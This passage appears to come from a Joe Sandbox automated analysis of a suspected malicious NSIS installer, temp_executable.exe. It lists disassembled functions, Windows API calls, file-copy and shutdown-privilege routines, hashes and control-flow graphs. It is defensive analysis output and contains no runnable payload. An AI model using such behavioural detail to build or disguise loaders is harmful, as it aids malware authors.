                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                • String ID: @$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 4079680657-1528140705
                                • Opcode ID: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction ID: 1a2f5228193f18700cea608b7af5492b6fd1c87105d587b586e39d0dc9a83391
                                • Opcode Fuzzy Hash: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction Fuzzy Hash: 3C118C71A483809BC710AFA2C94561ABBE9BFC4745F40493EF595A72D1DBBC8805CB4A
                                Function 00405E19 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction ID: 2395f8a8d7837bad9ab877b1c5b4dd478f8f3e4f7c6de220d66e2a00ae86bb09
                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                • Instruction Fuzzy Hash: A201EC75D00609DFDB109FA0DA44BAE7BB4EF14315F10453AD989F2190D7789648CF99
                                Function 00403364 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                Function 00406613 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Sortkridts Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                • GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                Function 004058AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                Function 004061EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                                Download Yara Rule
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                Function 00406CEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,00403433,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                Strings
                                • C:\Users\user\AppData\Local\Temp, xrefs: 00406CEB
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp
                                • API String ID: 2709904686-670666241
                                • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                Execution Graph

                                Execution Coverage:0%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:100%
                                Total number of Nodes:1
                                Total number of Limit Nodes:0
                                execution_graph 62058 32d82b90 LdrInitializeThunk

                                Executed Functions

                                Function 32D834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4 32d834e0-32d834ec LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3edb027c598ff89e30bb81f3956250c5bdfbd891316874dc5cf99d7b250b0a74
                                • Instruction ID: e3ee6d1431476e0ad609ea3637d0a49251a880878775034f7972b194395ff01d
                                • Opcode Fuzzy Hash: 3edb027c598ff89e30bb81f3956250c5bdfbd891316874dc5cf99d7b250b0a74
                                • Instruction Fuzzy Hash: 2090023165510402D60062986714746100547D1601F61C856B041C538DC7A5895576B2
                                Function 32D82BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1 32d82bc0-32d82bcc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 35fad57f82ba1dfeaddcecc9d98c017f70a6175b117c785bf91e2304a85bf981
                                • Instruction ID: e5df1c89bba143c39521de81ce5a79d8e8f1634bc27d166865236aa3a7ba606b
                                • Opcode Fuzzy Hash: 35fad57f82ba1dfeaddcecc9d98c017f70a6175b117c785bf91e2304a85bf981
                                • Instruction Fuzzy Hash: BF90023125100402D60066D87608686000547E1701F51D456B501C535EC67588957231
                                Function 32D82B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 32d82b90-32d82b9c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 74c777f7ce30ddd0e27c599303f2a2d2311639142371b892bcb503aa2304e713
                                • Instruction ID: a97606fd0543705c37ec4b9fcbea4032667a1240666145c3dbe3967e5f4777e3
                                • Opcode Fuzzy Hash: 74c777f7ce30ddd0e27c599303f2a2d2311639142371b892bcb503aa2304e713
                                • Instruction Fuzzy Hash: 0F90023125108802D6106298A60478A000547D1701F55C856B441C638DC6A588957231
                                Function 32D82EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3 32d82eb0-32d82ebc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ee5981a93259e25bd13e34df869ef839147d909f3a0f23d52c8b1259d3895e83
                                • Instruction ID: 7678cc4db593878d583fa31c07b22c2938b06430021921013d32d1fe6918afde
                                • Opcode Fuzzy Hash: ee5981a93259e25bd13e34df869ef839147d909f3a0f23d52c8b1259d3895e83
                                • Instruction Fuzzy Hash: C190023125140402D60062986A1474B000547D1702F51C456B115C535DC63588557671
                                Function 32D82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2 32d82d10-32d82d1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a7a41abc40a6171ce38b93fca88d12e3817b2eac8fddbf77aca577a547947372
                                • Instruction ID: 98d0a11418f97e7f761e52adef7b49168cd9a5b826093d43bcdb3a3410ce706e
                                • Opcode Fuzzy Hash: a7a41abc40a6171ce38b93fca88d12e3817b2eac8fddbf77aca577a547947372
                                • Instruction Fuzzy Hash: 5E90023125100413D61162986704747000947D1641F91C857B041C538DD6668956B231

                                Non-executed Functions

                                Function 004036D7 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 416stringfilecomCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5 4036d7-403720 SetErrorMode GetVersionExW 6 403722-403742 GetVersionExW 5->6 7 403759 5->7 8 403744-403748 6->8 9 403755-403757 6->9 10 403760-403765 7->10 11 40374b-403753 8->11 9->11 12 403772 10->12 13 403767-403770 10->13 11->10 14 403776-4037b8 12->14 13->14 15 4037ba-4037c2 call 4068c1 14->15 16 4037cb 14->16 15->16 21 4037c4 15->21 18 4037d0-4037e2 call 406179 lstrlenA 16->18 23 4037e4-403800 call 4068c1 * 3 18->23 21->16 30 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406af5 GetCommandLineW call 406af5 call 4065d1 CharNextW 23->30 31 403802-403808 23->31 40 4038b0 30->40 41 403985-40399f GetTempPathW call 403c80 30->41 31->30 35 40380a 31->35 35->30 43 4038b2-4038b8 40->43 47 4039a1-4039bf GetWindowsDirectoryW lstrcatW call 403c80 41->47 48 4039f7-403a10 DeleteFileW call 4033c8 41->48 45 4038c5-4038d0 43->45 46 4038ba-4038c3 43->46 49 4038d2-4038d9 45->49 50 4038db-4038ea 45->50 46->45 46->46 47->48 66 4039c1-4039f1 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c80 47->66 60 403bc1 48->60 61 403a16-403a1c 48->61 49->50 51 403945-403959 call 4065d1 50->51 52 4038ec-4038f8 50->52 74 403961-403967 51->74 75 40395b-40395e 51->75 55 403912-403918 52->55 56 4038fa-403901 52->56 64 403934-40393b 55->64 65 40391a-403921 55->65 62 403903-403906 56->62 63 403908 56->63 70 403bc5-403bd2 call 4036ad OleUninitialize 60->70 68 403a81-403a8f call 405a19 61->68 69 403a1e-403a30 call 4065d1 61->69 62->55 62->63 63->55 64->51 72 40393d-403943 64->72 65->64 71 403923-40392a 65->71 66->48 88 403bbf 66->88 68->70 89 403a46-403a48 69->89 90 403bd4-403bdf call 406a83 70->90 91 403be7-403bee 70->91 80 403931 71->80 81 40392c-40392f 71->81 72->51 82 403971-403980 call 406af5 72->82 74->41 76 403969-40396c 74->76 75->74 76->43 80->64 81->64 81->80 82->41 88->60 92 403a32-403a38 89->92 93 403a4a-403a51 89->93 103 403be1 ExitProcess 90->103 95 403bf0-403c06 GetCurrentProcess OpenProcessToken 91->95 96 403c6c-403c7b 91->96 99 403a43 92->99 100 403a3a-403a41 92->100 101 403a53-403a63 call 406613 93->101 102 403a94-403aac call 4064d7 lstrcatW 93->102 97 403c08-403c36 LookupPrivilegeValueW AdjustTokenPrivileges 95->97 98 403c3c-403c4a call 4068c1 95->98 96->103 97->98 111 403c58-403c63 ExitWindowsEx 98->111 112 403c4c-403c56 98->112 99->89 100->93 100->99 115 403a69-403a7f call 406af5 * 2 101->115 116 403bbb-403bbd 101->116 113 403abd-403ade lstrcatW lstrcmpiW 102->113 114 403aae-403ab8 lstrcatW 102->114 111->96 117 403c65-403c67 call 401533 111->117 112->111 112->117 113->116 118 403ae4-403aeb 113->118 114->113 115->68 116->70 117->96 122 403af4 call 405df9 118->122 123 403aed-403af2 call 405e19 118->123 130 403af9-403b0b SetCurrentDirectoryW 122->130 123->130 131 403b1c-403b36 call 406af5 130->131 132 403b0d-403b17 call 406af5 130->132 136 403b37-403b55 call 405e95 DeleteFileW 131->136 132->131 139 403ba4-403bae 136->139 140 403b57-403b6b CopyFileW 136->140 139->136 141 403bb0-403bb6 call 406218 139->141 140->139 142 403b6d-403b99 call 406218 call 405e95 call 4066b1 140->142 141->116 142->139 150 403b9b-403ba2 CloseHandle 142->150 150->139
                                APIs
                                • SetErrorMode.KERNEL32(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(00428D00,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,00434000,?,00434000,00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,00436800), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(00436800,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(00436800,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004039E8
                                • DeleteFileW.KERNEL32(00436000), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(00436800,~nsu,00434000,00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(00436800,00408600,00436800,~nsu,00434000,00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(00436800,.tmp,00436800,~nsu,00434000,00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(00437800,004209C0,00000001), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNEL32(?,00000000,00436800,00403CA4,00436800,00436800,00436800,00436800,76073420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
